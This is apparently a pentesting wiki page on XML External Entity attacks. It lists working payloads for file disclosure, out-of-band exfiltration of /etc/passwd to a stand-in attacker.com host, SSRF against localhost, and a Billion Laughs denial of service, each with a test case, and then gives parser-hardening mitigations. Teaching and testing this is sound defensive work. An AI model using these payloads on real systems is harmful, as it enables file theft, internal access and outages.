XXE

Description: XML External Entity (XXE) attacks exploit vulnerabilities in XML parsers that process external entities within XML documents. By injecting malicious XML entities, attackers can read files, access internal systems, or execute remote code on the server.

Example with Scenario: Consider a web application that accepts XML input for processing. If the XML parser is configured to resolve external entities, an attacker can inject a malicious entity to read sensitive files or perform network requests.

Payloads and Test Cases:

Basic XXE to Read Files:

<?xml version="1.0"?>
<!DOCTYPE foo [  
    <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>

Test Case: Verify if the response includes the content of /etc/passwd.

Blind XXE with Out-of-Band Data Exfiltration:
```
<?xml version="1.0"?>
<!DOCTYPE foo [  
    <!ENTITY xxe SYSTEM "http://attacker.com?data=file:///etc/passwd"> ]>
<foo>&xxe;</foo>
```
- Test Case: Check the server logs or network traffic to see if there is an outbound request to http://attacker.com.

XXE to Perform SSRF:

<?xml version="1.0"?>
<!DOCTYPE foo [  
    <!ENTITY xxe SYSTEM "http://localhost/admin"> ]>
<foo>&xxe;</foo>

Test Case: Observe if there is any interaction with internal services like http://localhost/admin.

Billion Laughs Attack (Denial of Service):

<?xml version="1.0"?>
<!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Test Case: The server may crash or become unresponsive due to excessive resource consumption.

XXE with Parameter Entities (File Disclosure):

<?xml version="1.0"?>
<!DOCTYPE foo [
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
    %eval;
    %exfil;
]>
<foo>&xxe;</foo>

Test Case: Check for network traffic to http://attacker.com containing the file content.

Mitigation:

Disable External Entity Resolution:

Configure the XML parser to disable external entity resolution.

SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);

Use a Secure XML Parser:
- Use XML parsers that are secure by default, such as defusedxml in Python.
Input Validation:
- Validate and sanitize XML input to ensure it does not contain any external entities.
Limit File System Access:
- Run the application with the least privileges necessary, and restrict file system access.
Network Segmentation:
- Ensure that servers processing XML input are not able to access sensitive internal networks.

PreviousSSRF NextIDOR

Last updated 1 year ago